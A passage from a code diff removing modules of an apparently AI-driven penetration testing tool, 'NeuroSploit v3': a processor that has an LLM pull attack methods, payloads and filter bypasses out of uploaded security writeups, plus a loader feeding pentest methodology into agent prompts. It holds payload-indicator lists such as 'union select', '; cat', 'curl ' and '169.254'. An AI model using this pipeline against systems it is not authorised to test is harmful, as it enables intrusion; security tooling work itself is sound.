return code_match.group(1).strip()
# If no code block, check if response looks like code
if "import " in response and "requests" in response:
return response.strip()
except Exception:
pass
return None
def _extract_marker(self, payload: str, vuln_type: str) -> str:
"""Extract a marker string from payload for grep verification."""
if "alert" in payload:
return "alert"
if "script" in payload.lower():
return "script"
return payload[:20] if payload else vuln_type
def _get_expected_output(self, payload: str, vuln_type: str) -> str:
"""Get expected output for template expression evaluation."""
if "7*7" in payload:
return "49"
if "7*8" in payload:
return "56"
return ""
def _generate_steps(self, vuln_type: str, endpoint: str,
param: str, payload: str) -> List[str]:
"""Generate human-readable exploitation steps."""
return [
f"1. Navigate to {endpoint}",
f"2. Inject payload into '{param}' parameter: {payload[:80]}",
f"3. Observe response for {vuln_type} indicators",
f"4. Verify exploitation impact",
]
@@ -1,444 +0,0 @@
"""
NeuroSploit v3 - Knowledge Processor
Pipeline: Upload Extract Text AI Summarize Index by Vuln Type Store.
Processes bug bounty papers, CVE documents, writeups, and lab reports
into structured knowledge the agent uses during testing.
"""
import json
import re
import uuid
import shutil
from pathlib import Path
from datetime import datetime
from typing import List, Dict, Optional, Any
import logging
logger = logging.getLogger(__name__)
# Optional PDF support
try:
from PyPDF2 import PdfReader
HAS_PYPDF2 = True
except ImportError:
HAS_PYPDF2 = False
KNOWLEDGE_DIR = Path("data/custom-knowledge")
UPLOADS_DIR = KNOWLEDGE_DIR / "uploads"
INDEX_FILE = KNOWLEDGE_DIR / "index.json"
SUPPORTED_FORMATS = {".pdf", ".md", ".txt", ".html", ".htm"}
# Standard vuln type keywords for classification
VULN_KEYWORDS = {
"xss": ["xss", "cross-site scripting", "cross site scripting", "script injection", "reflected xss", "stored xss", "dom xss"],
"sqli": ["sql injection", "sqli", "sql inject", "union select", "blind sql", "boolean-based", "time-based"],
"ssrf": ["ssrf", "server-side request forgery", "server side request forgery", "internal request"],
"idor": ["idor", "insecure direct object reference", "direct object reference", "horizontal privilege"],
"rce": ["rce", "remote code execution", "command injection", "os command", "code execution"],
"lfi": ["lfi", "local file inclusion", "file inclusion", "path traversal", "directory traversal"],
"rfi": ["rfi", "remote file inclusion"],
"csrf": ["csrf", "cross-site request forgery", "cross site request forgery"],
"xxe": ["xxe", "xml external entity", "xml injection"],
"ssti": ["ssti", "server-side template injection", "template injection"],
"auth_bypass": ["auth bypass", "authentication bypass", "login bypass", "2fa bypass", "mfa bypass"],
"open_redirect": ["open redirect", "url redirect", "redirect vulnerability"],
"race_condition": ["race condition", "toctou", "time of check"],
"deserialization": ["deserialization", "deserialize", "insecure deserialization", "pickle", "java serialization"],
"graphql": ["graphql", "graphql injection", "introspection"],
"nosql": ["nosql", "nosql injection", "mongodb injection"],
"jwt": ["jwt", "json web token", "jwt attack", "jwt bypass"],
"cors": ["cors", "cross-origin", "access-control-allow-origin"],
"crlf": ["crlf", "crlf injection", "header injection"],
"upload": ["file upload", "upload bypass", "unrestricted upload", "webshell"],
"subdomain_takeover": ["subdomain takeover", "dangling dns"],
"information_disclosure": ["information disclosure", "info leak", "data exposure", "sensitive data"],
"privilege_escalation": ["privilege escalation", "privesc", "vertical privilege"],
"bola": ["bola", "broken object level authorization"],
"bfla": ["bfla", "broken function level authorization"],
"api": ["api security", "api vulnerability", "rest api", "api abuse"],
"websocket": ["websocket", "ws hijacking"],
"cache_poisoning": ["cache poisoning", "web cache"],
"prototype_pollution": ["prototype pollution", "__proto__"],
"clickjacking": ["clickjacking", "ui redressing", "x-frame-options"],
}
AI_ANALYSIS_PROMPT = """You are a security research analyst. Analyze the following security document and extract structured knowledge for a penetration testing AI agent.
Document filename: {filename}
Document content (truncated):
{text}
Extract the following as JSON:
{{
"title": "Short descriptive title for this document",
"summary": "2-3 sentence summary of the key security findings/methodology",
"vuln_types": ["list", "of", "vuln_types"],
"knowledge_entries": [
{{
"vuln_type": "the_vuln_type",
"methodology": "Step-by-step attack methodology described in the document",
"payloads": ["specific payloads or PoC code mentioned"],
"key_insights": "What makes this approach unique or effective",
"bypass_techniques": ["any WAF/filter/defense bypasses described"]
}}
]
}}
RULES:
- vuln_types must use standard identifiers: xss, sqli, ssrf, idor, rce, lfi, csrf, xxe, ssti, auth_bypass, open_redirect, race_condition, deserialization, graphql, nosql, jwt, cors, crlf, upload, subdomain_takeover, information_disclosure, privilege_escalation, bola, bfla, api, websocket, cache_poisoning, prototype_pollution, clickjacking
- Only extract information EXPLICITLY present in the document
- Do NOT fabricate payloads or methodologies not described in the text
- Each knowledge_entry should map to exactly one vuln_type
- If the document covers multiple vuln types, create separate entries for each
"""
class KnowledgeProcessor:
"""Processes uploaded security documents into indexed knowledge."""
def __init__(self, llm_client=None):
self.llm_client = llm_client
self._index = self._load_index()
KNOWLEDGE_DIR.mkdir(parents=True, exist_ok=True)
UPLOADS_DIR.mkdir(parents=True, exist_ok=True)
def _load_index(self) -> dict:
"""Load or initialize the knowledge index."""
if INDEX_FILE.exists():
try:
return json.loads(INDEX_FILE.read_text())
except Exception as e:
logger.warning(f"Failed to load knowledge index: {e}")
return {"documents": [], "vuln_type_index": {}, "version": "1.0"}
def _save_index(self):
"""Persist index to disk."""
self._index["updated_at"] = datetime.utcnow().isoformat()
INDEX_FILE.write_text(json.dumps(self._index, indent=2))
async def process_upload(self, file_bytes: bytes, filename: str) -> dict:
"""Full pipeline for a single file upload."""
ext = Path(filename).suffix.lower()
if ext not in SUPPORTED_FORMATS:
raise ValueError(f"Unsupported format: {ext}. Supported: {', '.join(SUPPORTED_FORMATS)}")
# Generate unique ID
doc_id = str(uuid.uuid4())[:12]
# Save raw file
safe_filename = re.sub(r'[^a-zA-Z0-9._-]', '_', filename)
file_path = UPLOADS_DIR / f"{doc_id}_{safe_filename}"
file_path.write_bytes(file_bytes)
# Extract text
text = self._extract_text(file_path, ext)
if not text or len(text.strip()) < 50:
file_path.unlink(missing_ok=True)
raise ValueError("Document has insufficient text content (< 50 chars)")
# AI analysis (or keyword-based fallback)
if self.llm_client:
analysis = await self._ai_analyze(text, filename)
else:
analysis = self._keyword_analyze(text, filename)
# Build document entry
doc_entry = {
"id": doc_id,
"filename": filename,
"title": analysis.get("title", filename),
"source_type": ext.lstrip("."),
"uploaded_at": datetime.utcnow().isoformat(),
"processed": True,
"file_size_bytes": len(file_bytes),
"summary": analysis.get("summary", ""),
"vuln_types": analysis.get("vuln_types", []),
"knowledge_entries": analysis.get("knowledge_entries", []),
}
# Add to index
self._index_document(doc_entry)
self._save_index()
logger.info(f"Processed knowledge document: {filename} -> {len(doc_entry['knowledge_entries'])} entries")
return doc_entry
def _extract_text(self, file_path: Path, ext: str) -> str:
"""Extract text from file based on format."""
if ext == ".pdf":
return self._extract_text_pdf(file_path)
elif ext in (".md", ".txt"):
return self._extract_text_plaintext(file_path)
elif ext in (".html", ".htm"):
return self._extract_text_html(file_path)
return ""
def _extract_text_pdf(self, file_path: Path) -> str:
"""Extract text from PDF."""
if not HAS_PYPDF2:
logger.warning("PyPDF2 not installed - PDF extraction unavailable. Install: pip install PyPDF2")
# Try reading as text fallback
try:
return file_path.read_text(errors="ignore")[:20000]
except Exception:
return ""
try:
reader = PdfReader(str(file_path))
text_parts = []
for page in reader.pages[:50]: # Max 50 pages
page_text = page.extract_text()
if page_text:
text_parts.append(page_text)
return "\n\n".join(text_parts)
except Exception as e:
logger.warning(f"PDF extraction failed: {e}")
return ""
def _extract_text_plaintext(self, file_path: Path) -> str:
"""Read markdown or plain text file."""
try:
return file_path.read_text(errors="ignore")
except Exception:
return ""
def _extract_text_html(self, file_path: Path) -> str:
"""Extract text from HTML by stripping tags."""
try:
html = file_path.read_text(errors="ignore")
# Remove script and style blocks
html = re.sub(r'<script[^>]*>.*?</script>', '', html, flags=re.DOTALL | re.IGNORECASE)
html = re.sub(r'<style[^>]*>.*?</style>', '', html, flags=re.DOTALL | re.IGNORECASE)
# Strip all tags
text = re.sub(r'<[^>]+>', ' ', html)
# Clean whitespace
text = re.sub(r'\s+', ' ', text).strip()
return text
except Exception:
return ""
async def _ai_analyze(self, text: str, filename: str) -> dict:
"""Use LLM to extract structured knowledge."""
truncated = text[:8000]
prompt = AI_ANALYSIS_PROMPT.format(filename=filename, text=truncated)
try:
response = await self.llm_client.generate(prompt)
# Parse JSON from response
match = re.search(r'\{.*\}', response, re.DOTALL)
if match:
data = json.loads(match.group())
# Validate vuln_types
valid_types = set(VULN_KEYWORDS.keys())
data["vuln_types"] = [vt for vt in data.get("vuln_types", []) if vt in valid_types]
for entry in data.get("knowledge_entries", []):
if entry.get("vuln_type") not in valid_types:
entry["vuln_type"] = data["vuln_types"][0] if data["vuln_types"] else "information_disclosure"
return data
except Exception as e:
logger.warning(f"AI analysis failed, falling back to keyword analysis: {e}")
return self._keyword_analyze(text, filename)
def _keyword_analyze(self, text: str, filename: str) -> dict:
"""Fallback keyword-based analysis when no LLM available."""
text_lower = text.lower()
detected_types = []
for vuln_type, keywords in VULN_KEYWORDS.items():
for keyword in keywords:
if keyword in text_lower:
detected_types.append(vuln_type)
break
if not detected_types:
detected_types = ["information_disclosure"]
# Extract title from first line or filename
first_line = text.strip().split("\n")[0][:200]
title = first_line if len(first_line) > 10 else filename
# Build basic entries
entries = []
for vt in detected_types[:5]: # Max 5 types
entries.append({
"vuln_type": vt,
"methodology": self._extract_section(text, ["methodology", "steps", "approach", "technique"]),
"payloads": self._extract_payloads(text),
"key_insights": self._extract_section(text, ["insight", "key finding", "conclusion", "takeaway"]),
"bypass_techniques": self._extract_payloads_by_pattern(text, ["bypass", "evasion", "waf", "filter"]),
})
return {
"title": title.strip("#").strip(),
"summary": text[:300].strip(),
"vuln_types": detected_types,
"knowledge_entries": entries,
}
def _extract_section(self, text: str, keywords: List[str]) -> str:
"""Extract text section near keywords."""
text_lower = text.lower()
for keyword in keywords:
idx = text_lower.find(keyword)
if idx >= 0:
# Get surrounding context (up to 800 chars after keyword)
start = max(0, idx - 50)
end = min(len(text), idx + 800)
return text[start:end].strip()
return ""
def _extract_payloads(self, text: str) -> List[str]:
"""Extract potential payloads from text."""
payloads = []
# Look for common payload patterns
patterns = [
r'`([^`]{5,200})`', # Backtick-enclosed code
r"'([^']{10,200})'", # Single-quoted strings that look like payloads
]
for pattern in patterns:
matches = re.findall(pattern, text)
for m in matches:
if any(indicator in m.lower() for indicator in
["<script", "alert(", "onerror", "union select", "../", "{{",
"curl ", "wget ", "%00", "127.0.0.1", "169.254", "; cat",
"' or ", '" or ', "1=1", "exec(", "system("]):
payloads.append(m)
return payloads[:20] # Max 20 payloads
def _extract_payloads_by_pattern(self, text: str, keywords: List[str]) -> List[str]:
"""Extract text fragments near specific keywords."""
results = []
text_lower = text.lower()
for keyword in keywords:
idx = text_lower.find(keyword)
if idx >= 0:
start = max(0, idx - 20)
end = min(len(text), idx + 200)
fragment = text[start:end].strip()
if fragment:
results.append(fragment[:200])
return results[:10]
def _index_document(self, doc_entry: dict):
"""Add document to the index."""
# Remove existing doc with same ID if re-processing
self._index["documents"] = [
d for d in self._index["documents"] if d["id"] != doc_entry["id"]
]
self._index["documents"].append(doc_entry)
# Update vuln_type_index
for vt in doc_entry.get("vuln_types", []):
if vt not in self._index["vuln_type_index"]:
self._index["vuln_type_index"][vt] = []
if doc_entry["id"] not in self._index["vuln_type_index"][vt]:
self._index["vuln_type_index"][vt].append(doc_entry["id"])
def get_documents(self) -> List[dict]:
"""Return all indexed documents (without full entries for list view)."""
docs = []
for d in self._index.get("documents", []):
docs.append({
"id": d["id"],
"filename": d["filename"],
"title": d["title"],
"source_type": d["source_type"],
"uploaded_at": d["uploaded_at"],
"processed": d["processed"],
"file_size_bytes": d["file_size_bytes"],
"summary": d["summary"],
"vuln_types": d["vuln_types"],
"entries_count": len(d.get("knowledge_entries", [])),
})
return docs
def get_document(self, doc_id: str) -> Optional[dict]:
"""Get a specific document with full entries."""
for d in self._index.get("documents", []):
if d["id"] == doc_id:
return d
return None
def delete_document(self, doc_id: str) -> bool:
"""Remove document from index and delete uploaded file."""
doc = self.get_document(doc_id)
if not doc:
return False
# Remove from documents list
self._index["documents"] = [
d for d in self._index["documents"] if d["id"] != doc_id
]
# Remove from vuln_type_index
for vt, doc_ids in self._index.get("vuln_type_index", {}).items():
if doc_id in doc_ids:
doc_ids.remove(doc_id)
# Delete uploaded file
for f in UPLOADS_DIR.glob(f"{doc_id}_*"):
f.unlink(missing_ok=True)
self._save_index()
return True
def search_by_vuln_type(self, vuln_type: str, max_entries: int = 5) -> List[dict]:
"""Search knowledge entries by vulnerability type."""
vuln_key = vuln_type.lower().replace(" ", "_").replace("-", "_")
doc_ids = self._index.get("vuln_type_index", {}).get(vuln_key, [])
if not doc_ids:
return []
entries = []
for doc in self._index.get("documents", []):
if doc["id"] in doc_ids:
for ke in doc.get("knowledge_entries", []):
if ke.get("vuln_type") == vuln_key:
entry = dict(ke)
entry["source_document"] = doc["title"]
entry["source_id"] = doc["id"]
entries.append(entry)
return entries[:max_entries]
def get_stats(self) -> dict:
"""Get knowledge base statistics."""
docs = self._index.get("documents", [])
total_entries = sum(len(d.get("knowledge_entries", [])) for d in docs)
vuln_types = list(self._index.get("vuln_type_index", {}).keys())
# Calculate storage size
storage_bytes = 0
if UPLOADS_DIR.exists():
for f in UPLOADS_DIR.iterdir():
storage_bytes += f.stat().st_size
return {
"total_documents": len(docs),
"total_entries": total_entries,
"vuln_types_covered": sorted(vuln_types),
"storage_bytes": storage_bytes,
}
def get_patterns_for_vuln(self, vuln_type: str, max_entries: int = 3) -> str:
"""Get formatted knowledge patterns for a vuln type (for LLM context injection)."""
entries = self.search_by_vuln_type(vuln_type, max_entries)
if not entries:
return ""
result = "\n\n=== CUSTOM KNOWLEDGE (User-Uploaded Research) ===\n"
for i, entry in enumerate(entries, 1):
result += f"--- Research {i}: {entry.get('source_document', 'Unknown')} ---\n"
if entry.get("methodology"):
result += f"Methodology: {entry['methodology'][:800]}\n"
if entry.get("payloads"):
result += f"Payloads: {', '.join(entry['payloads'][:5])}\n"
if entry.get("key_insights"):
result += f"Key Insights: {entry['key_insights'][:400]}\n"
if entry.get("bypass_techniques"):
result += f"Bypass Techniques: {', '.join(entry['bypass_techniques'][:3])}\n"
result += "\n"
result += "=== END CUSTOM KNOWLEDGE ===\n"
return result
File diff suppressed because it is too large Load Diff
@@ -1,552 +0,0 @@
"""
Methodology Loader - Parses external pentest methodology .md files and indexes them
for smart injection into all LLM call sites in the autonomous agent.
Supports FASE-based methodology documents (like pentestcompleto.md) as well as
generic markdown documents. Maps sections to vulnerability types and agent contexts
for targeted injection with per-context character budgets.
"""
import logging
import os
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional
logger = logging.getLogger(__name__)
# ─── FASE → Vulnerability Type Mapping ───────────────────────────────────────
# Maps each FASE section to the agent's vulnerability type identifiers.
# These match the 100 types in vuln_engine/registry.py.
FASE_VULN_TYPE_MAP: Dict[str, List[str]] = {
"fase_0": [], # Recon - broad, no specific vuln types
"fase_1": [], # Architecture analysis - broad strategy
"fase_2": [
"jwt_manipulation", "session_fixation", "broken_auth", "auth_bypass",
"insecure_password_reset", "account_takeover", "cookie_manipulation",
"captcha_bypass", "session_hijacking",
],
"fase_3": [
"idor", "bola", "bfla", "privilege_escalation", "forced_browsing",
"auth_bypass", "mass_assignment",
],
"fase_4": [
"race_condition", "business_logic", "workflow_bypass",
"payment_manipulation", "insufficient_anti_automation",
],
"fase_5": [], # CVE/Zero-day - applies to all types via strategy context
"fase_6": [
"ssrf", "cloud_misconfig", "s3_bucket_misconfiguration",
"cloud_metadata_exposure", "serverless_misconfiguration",
"kubernetes_misconfig", "iam_misconfig",
],
"fase_7": [], # OWASP WSTG reference - strategy context
"fase_8": [
"bola", "bfla", "mass_assignment", "excessive_data_exposure",
"api_abuse", "api_rate_limiting", "rest_api_versioning",
"broken_auth", "ssrf",
],
"fase_9": [
"graphql_injection", "graphql_introspection", "graphql_dos",
"websocket_security", "grpc_security",
],
"fase_10": [
"sqli_error", "sqli_union", "sqli_blind", "sqli_time", "sqli_oob",
"nosql_injection", "ssti", "ldap_injection", "xpath_injection",
"crlf_injection", "header_injection", "parameter_pollution",
"command_injection", "email_injection", "expression_language_injection",
"log_injection", "orm_injection", "ssi_injection", "xslt_injection",
"csv_injection",
],
"fase_11": [
"xss_reflected", "xss_stored", "xss_dom", "cors_misconfig",
"csp_bypass", "clickjacking", "open_redirect", "prototype_pollution",
"html_injection", "css_injection", "dom_clobbering", "postmessage_abuse",
"dangling_markup",
],
"fase_12": [
"http_request_smuggling", "cache_poisoning", "cache_deception",
"http2_smuggling", "connection_pool_poisoning", "http_method_tampering",
],
"fase_13": [
"file_upload", "lfi", "rfi", "path_traversal", "zip_slip",
],
"fase_14": [
"ssrf", "dns_rebinding", "blind_ssrf",
],
"fase_15": [
"broken_auth", "insecure_password_reset", "brute_force",
"account_enumeration", "captcha_bypass", "session_fixation",
"account_takeover", "mfa_bypass",
],
"fase_16": [
"mass_assignment", "rate_limit_bypass", "api_rate_limiting",
"brute_force",
],
"fase_17": [
"information_disclosure", "subdomain_takeover", "directory_listing",
"default_credentials", "security_headers", "ssl_tls",
"debug_endpoints", "backup_files", "source_code_exposure",
"sensitive_data_exposure",
],
"fase_18": [
"insecure_deserialization",
],
"fase_19": [
"denial_of_service", "graphql_dos", "redos", "xml_bomb",
],
"fase_20": [
"xxe",
],
}
# ─── FASE → Agent Context Mapping ────────────────────────────────────────────
# Maps each FASE to the agent contexts where it should be injected.
FASE_CONTEXT_MAP: Dict[str, List[str]] = {
"fase_0": ["strategy"],
"fase_1": ["strategy"],
"fase_2": ["testing", "verification", "confirmation"],
"fase_3": ["testing", "verification", "confirmation"],
"fase_4": ["testing", "confirmation", "strategy"],
"fase_5": ["strategy", "testing"],
"fase_6": ["testing", "verification"],
"fase_7": ["strategy"],
"fase_8": ["testing", "verification", "confirmation"],
"fase_9": ["testing", "verification"],
"fase_10": ["testing", "verification", "confirmation"],
"fase_11": ["testing", "verification", "confirmation"],
"fase_12": ["testing", "verification"],
"fase_13": ["testing", "verification", "confirmation"],
"fase_14": ["testing", "verification"],
"fase_15": ["testing", "verification", "confirmation"],
"fase_16": ["testing", "confirmation"],
"fase_17": ["testing", "reporting"],
"fase_18": ["testing", "verification", "confirmation"],
"fase_19": ["testing"],
"fase_20": ["testing", "verification", "confirmation"],
}
# ─── Keyword → Vuln Type Mapping (for non-FASE documents) ───────────────────
KEYWORD_VULN_MAP: Dict[str, List[str]] = {
"sql injection": ["sqli_error", "sqli_union", "sqli_blind", "sqli_time"],
"xss": ["xss_reflected", "xss_stored", "xss_dom"],
"cross-site scripting": ["xss_reflected", "xss_stored", "xss_dom"],
"ssrf": ["ssrf", "blind_ssrf"],
"server-side request forgery": ["ssrf", "blind_ssrf"],
"xxe": ["xxe"],
"xml external entity": ["xxe"],
"ssti": ["ssti"],
"template injection": ["ssti"],
"idor": ["idor", "bola"],
"broken access": ["bola", "bfla", "idor"],
"deserialization": ["insecure_deserialization"],
"file upload": ["file_upload"],
"lfi": ["lfi", "path_traversal"],
"local file inclusion": ["lfi", "path_traversal"],
"rfi": ["rfi"],
"remote file inclusion": ["rfi"],
"command injection": ["command_injection"],
"cors": ["cors_misconfig"],
"csrf": ["csrf"],
"clickjacking": ["clickjacking"],
"open redirect": ["open_redirect"],
"jwt": ["jwt_manipulation"],
"oauth": ["broken_auth", "auth_bypass"],
"race condition": ["race_condition"],
"prototype pollution": ["prototype_pollution"],
"request smuggling": ["http_request_smuggling"],
"cache poisoning": ["cache_poisoning"],
"graphql": ["graphql_injection", "graphql_introspection", "graphql_dos"],
"websocket": ["websocket_security"],
"nosql": ["nosql_injection"],
"ldap": ["ldap_injection"],
"crlf": ["crlf_injection"],
"mass assignment": ["mass_assignment"],
"rate limit": ["rate_limit_bypass", "api_rate_limiting"],
}
@dataclass
class MethodologySection:
"""A parsed section from a methodology document."""
fase_id: str
title: str
content: str
sub_sections: Dict[str, str] = field(default_factory=dict)
vuln_types: List[str] = field(default_factory=list)
contexts: List[str] = field(default_factory=list)
@property
def char_count(self) -> int:
return len(self.content)
class MethodologyIndex:
"""Indexed methodology for fast retrieval by vuln_type and context."""
def __init__(self):
self.sections: Dict[str, MethodologySection] = {}
self.vuln_type_index: Dict[str, List[str]] = {} # vuln_type → [fase_ids]
self.context_index: Dict[str, List[str]] = {} # context → [fase_ids]
def add_section(self, section: MethodologySection) -> None:
self.sections[section.fase_id] = section
for vt in section.vuln_types:
self.vuln_type_index.setdefault(vt, []).append(section.fase_id)
for ctx in section.contexts:
self.context_index.setdefault(ctx, []).append(section.fase_id)
def get_for_vuln_and_context(
self,
vuln_type: str,
context: str,
max_chars: int = 2000,
) -> str:
"""Get methodology text relevant to both vuln_type and context.
Prefers sub-sections that mention the vuln_type for precision.
Truncates to max_chars budget.
"""
if not self.sections:
return ""
candidate_fase_ids: set = set()
# Find FASEs matching vuln_type
if vuln_type:
# Direct match
for fid in self.vuln_type_index.get(vuln_type, []):
candidate_fase_ids.add(fid)
# Fuzzy match: try without common suffixes
base_vt = vuln_type.replace("_reflected", "").replace("_stored", "").replace("_dom", "")
base_vt = base_vt.replace("_error", "").replace("_union", "").replace("_blind", "").replace("_time", "")
if base_vt != vuln_type:
for fid in self.vuln_type_index.get(base_vt, []):
candidate_fase_ids.add(fid)
# Filter by context
if context:
context_fases = set(self.context_index.get(context, []))
if candidate_fase_ids:
# Intersect for precision
filtered = candidate_fase_ids & context_fases
if filtered:
candidate_fase_ids = filtered
# If intersection is empty, keep vuln_type matches (they're more specific)
else:
# No vuln_type specified: use all context matches
candidate_fase_ids = context_fases
if not candidate_fase_ids:
return ""
# Build output, preferring targeted sub-sections
parts: List[str] = []
total = 0
for fase_id in sorted(candidate_fase_ids):
section = self.sections.get(fase_id)
if not section:
continue
remaining = max_chars - total
if remaining < 100:
break
# Try to find a targeted sub-section first
best_sub = self._find_best_subsection(section, vuln_type)
if best_sub:
title, content = best_sub
text = f"### {title}\n{content}"
else:
# Use full section content, truncated
text = f"### {section.title}\n{section.content}"
if len(text) > remaining:
text = text[:remaining]
if len(text) < 50:
continue # Skip tiny fragments
parts.append(text)
total += len(text)
return "\n\n".join(parts)
def _find_best_subsection(
self, section: MethodologySection, vuln_type: str
) -> Optional[tuple]:
"""Find the sub-section most relevant to a vuln_type."""
if not vuln_type or not section.sub_sections:
return None
# Normalize for matching
vt_variants = set()
vt_lower = vuln_type.lower()
vt_variants.add(vt_lower)
vt_variants.add(vt_lower.replace("_", " "))
vt_variants.add(vt_lower.replace("_", "-"))
# Common name mappings
name_map = {
"sqli": "sql injection",
"xss_reflected": "reflected xss",
"xss_stored": "stored xss",
"xss_dom": "dom xss",
"lfi": "lfi",
"rfi": "rfi",
"ssrf": "ssrf",
"ssti": "ssti",
"xxe": "xxe",
"nosql_injection": "nosql",
"crlf_injection": "crlf",
"cors_misconfig": "cors",
"insecure_deserialization": "deserialization",
"http_request_smuggling": "request smuggling",
"cache_poisoning": "cache poisoning",
"prototype_pollution": "prototype pollution",
}
mapped = name_map.get(vt_lower)
if mapped:
vt_variants.add(mapped)
best_score = 0
best = None
for sub_title, sub_content in section.sub_sections.items():
title_lower = sub_title.lower()
score = 0
for variant in vt_variants:
if variant in title_lower:
score = 10 # Title match is strongest
break
if variant in sub_content[:500].lower():
score = max(score, 5) # Content match
if score > best_score:
best_score = score
best = (sub_title, sub_content)
return best
class MethodologyLoader:
"""Loads and indexes methodology documents from files or DB prompts."""
def load_from_file(self, file_path: str) -> MethodologyIndex:
"""Load a .md methodology file and build an index."""
if not os.path.exists(file_path):
logger.warning(f"Methodology file not found: {file_path}")
return MethodologyIndex()
try:
with open(file_path, "r", encoding="utf-8") as f:
content = f.read()
except Exception as e:
logger.error(f"Failed to read methodology file: {e}")
return MethodologyIndex()
sections = self._parse_markdown_sections(content)
index = MethodologyIndex()
for section in sections:
index.add_section(section)
logger.info(
f"[METHODOLOGY] Loaded {len(sections)} sections from {file_path} "
f"({sum(s.char_count for s in sections)} chars, "
f"{len(index.vuln_type_index)} vuln types mapped)"
)
return index
def load_from_db_prompts(self, prompts: List[Dict]) -> MethodologyIndex:
"""Index database-loaded custom prompts into a MethodologyIndex."""
index = MethodologyIndex()
for i, p in enumerate(prompts):
content = p.get("content", "")
if not content:
continue
parsed_vulns = p.get("parsed_vulnerabilities", [])
# Try FASE-based parsing first
sections = self._parse_markdown_sections(content)
if not sections:
# Treat entire content as one section
vuln_types = [
v.get("type", "") for v in parsed_vulns if v.get("type")
]
if not vuln_types:
vuln_types = self._detect_vuln_types_by_keywords(content)
section = MethodologySection(
fase_id=f"db_prompt_{i}",
title=p.get("name", f"Custom Prompt {i}"),
content=content,
sub_sections={},
vuln_types=vuln_types,
contexts=["testing", "strategy", "confirmation",
"verification", "reporting"],
)
sections = [section]
for section in sections:
index.add_section(section)
logger.info(
f"[METHODOLOGY] Indexed {len(index.sections)} sections from "
f"{len(prompts)} DB prompts"
)
return index
def merge_indices(self, *indices: MethodologyIndex) -> MethodologyIndex:
"""Merge multiple MethodologyIndex objects into one."""
merged = MethodologyIndex()
for idx in indices:
for section in idx.sections.values():
# Avoid duplicate fase_ids
if section.fase_id not in merged.sections:
merged.add_section(section)
return merged
def _parse_markdown_sections(self, content: str) -> List[MethodologySection]:
"""Parse a markdown document into indexed sections.
Looks for FASE headings first, falls back to generic ## headings.
"""
sections = self._parse_fase_sections(content)
if sections:
return sections
# Fallback: parse generic ## headings
return self._parse_generic_sections(content)
def _parse_fase_sections(self, content: str) -> List[MethodologySection]:
"""Parse FASE-structured methodology documents."""
# Match ## FASE N: or # FASE N: or ## 🔐 FASE N: (with emoji)
fase_pattern = re.compile(
r'^(#{1,2})\s*(?:[^\w]*\s*)?FASE\s+(\d+)\s*[:\-]?\s*(.*?)$',
re.MULTILINE | re.IGNORECASE,
)
matches = list(fase_pattern.finditer(content))
if not matches:
return []
sections: List[MethodologySection] = []
# Also capture pre-FASE content (e.g., recon steps before FASE 1)
if matches[0].start() > 200:
pre_content = content[:matches[0].start()].strip()
if pre_content:
pre_subs = self._extract_sub_sections(pre_content)
sections.append(MethodologySection(
fase_id="fase_0",
title="Recon & Preparation",
content=pre_content,
sub_sections=pre_subs,
vuln_types=FASE_VULN_TYPE_MAP.get("fase_0", []),
contexts=FASE_CONTEXT_MAP.get("fase_0", ["strategy"]),
))
for i, match in enumerate(matches):
fase_num = match.group(2)
fase_title = f"FASE {fase_num}: {match.group(3).strip()}"
start = match.end()
end = matches[i + 1].start() if i + 1 < len(matches) else len(content)
body = content[start:end].strip()
fase_id = f"fase_{fase_num}"
sub_sections = self._extract_sub_sections(body)
vuln_types = FASE_VULN_TYPE_MAP.get(fase_id, [])
contexts = FASE_CONTEXT_MAP.get(fase_id, ["testing"])
# If not in our hardcoded map, try keyword detection
if not vuln_types:
vuln_types = self._detect_vuln_types_by_keywords(body)
sections.append(MethodologySection(
fase_id=fase_id,
title=fase_title,
content=body,
sub_sections=sub_sections,
vuln_types=vuln_types,
contexts=contexts,
))
return sections
def _parse_generic_sections(self, content: str) -> List[MethodologySection]:
"""Parse generic ## heading structured documents."""
heading_pattern = re.compile(r'^##\s+(.*?)$', re.MULTILINE)
matches = list(heading_pattern.finditer(content))
if not matches:
return []
sections: List[MethodologySection] = []
for i, match in enumerate(matches):
title = match.group(1).strip()
start = match.end()
end = matches[i + 1].start() if i + 1 < len(matches) else len(content)
body = content[start:end].strip()
vuln_types = self._detect_vuln_types_by_keywords(
title + " " + body[:1000]
)
sub_sections = self._extract_sub_sections(body)
sections.append(MethodologySection(
fase_id=f"section_{i}",
title=title,
content=body,
sub_sections=sub_sections,
vuln_types=vuln_types,
contexts=["testing", "strategy"],
))
return sections
def _extract_sub_sections(self, body: str) -> Dict[str, str]:
"""Extract ### sub-sections from a section body."""
sub_pattern = re.compile(r'^###\s+(.*?)$', re.MULTILINE)
sub_matches = list(sub_pattern.finditer(body))
sub_sections: Dict[str, str] = {}
for j, sub in enumerate(sub_matches):
sub_title = sub.group(1).strip()
sub_start = sub.end()
sub_end = (
sub_matches[j + 1].start()
if j + 1 < len(sub_matches)
else len(body)
)
sub_content = body[sub_start:sub_end].strip()
if sub_content:
sub_sections[sub_title] = sub_content
return sub_sections
def _detect_vuln_types_by_keywords(self, text: str) -> List[str]:
"""Detect vuln types from text content via keyword matching."""
text_lower = text.lower()
found: List[str] = []
seen: set = set()
for keyword, types in KEYWORD_VULN_MAP.items():
if keyword in text_lower:
for vt in types:
if vt not in seen:
found.append(vt)
seen.add(vt)
return found
@@ -1,321 +0,0 @@
"""
NeuroSploit v3 - Negative Control Engine
Sends benign/control payloads and compares responses to detect false positives
from same-behavior patterns. If the application responds the same way to a
benign value as it does to an attack payload, the finding is likely a false positive.
"""
import hashlib
import logging
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Tuple, Any
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Result types
# ---------------------------------------------------------------------------
@dataclass
class ControlTestResult:
"""Result of a single control test."""
control_type: str # "benign", "empty", "no_param"
control_value: str # The control payload used
status_match: bool # Did status code match attack response?
length_similar: bool # Body length within threshold?
hash_match: bool # Exact body match?
same_behavior: bool # Overall: does this control look the same?
detail: str = ""
@dataclass
class NegativeControlResult:
"""Aggregated result of all negative control tests."""
same_behavior: bool # True if ANY control shows same behavior as attack
controls_run: int # How many controls were executed
controls_matching: int # How many showed same behavior
confidence_adjustment: int # Penalty to apply (typically -60 if same_behavior)
results: List[ControlTestResult] = field(default_factory=list)
detail: str = ""
# ---------------------------------------------------------------------------
# Engine
# ---------------------------------------------------------------------------
class NegativeControlEngine:
"""Sends control payloads to detect false positives from same-behavior responses.
